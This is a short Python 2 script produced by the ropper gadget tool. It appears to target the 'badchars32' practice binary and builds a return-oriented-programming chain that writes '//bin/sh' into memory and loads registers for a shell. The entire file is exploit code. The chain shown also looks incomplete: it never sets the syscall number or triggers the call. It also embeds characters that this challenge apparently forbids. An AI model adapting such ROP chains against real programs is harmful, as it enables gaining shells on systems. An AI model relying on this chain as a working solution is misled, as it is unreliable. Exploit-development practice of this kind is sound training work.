#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # badchars32
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x00000899) # 0x08048899: pop esi; pop edi; ret; 
rop += '//bi'
rop += p(0xdeadbeef)
rop += rebase_0(0x0000089a) # 0x0804889a: pop edi; ret; 
rop += rebase_0(0x00002038)
rop += rebase_0(0x00000893) # 0x08048893: mov dword ptr [edi], esi; ret; 
rop += rebase_0(0x00000899) # 0x08048899: pop esi; pop edi; ret; 
rop += 'n/sh'
rop += p(0xdeadbeef)
rop += rebase_0(0x0000089a) # 0x0804889a: pop edi; ret; 
rop += rebase_0(0x0000203c)
rop += rebase_0(0x00000893) # 0x08048893: mov dword ptr [edi], esi; ret; 
rop += rebase_0(0x000008fb) # 0x080488fb: pop ebp; ret; 
rop += p(0x00000000)
rop += rebase_0(0x00000461) # 0x08048461: pop ebx; ret; 
rop += p(0x00000000)
rop += rebase_0(0x00000897) # 0x08048897: pop ecx; ret; 
rop += p(0x00000000)
rop += rebase_0(0x0000089a) # 0x0804889a: pop edi; ret; 
rop += p(0x00000000)
rop += rebase_0(0x00000899) # 0x08048899: pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0x00000000)
rop += rebase_0(0x0000089a) # 0x0804889a: pop edi; ret; 
rop += rebase_0(0x00002040)
rop += rebase_0(0x00000893) # 0x08048893: mov dword ptr [edi], esi; ret; 
# Filled registers: ebx, ecx, 
rop += rebase_0(0x00000461) # 0x08048461: pop ebx; ret; 
rop += rebase_0(0x00002038)
rop += rebase_0(0x00000897) # 0x08048897: pop ecx; ret; 
rop += rebase_0(0x00002040)
print rop
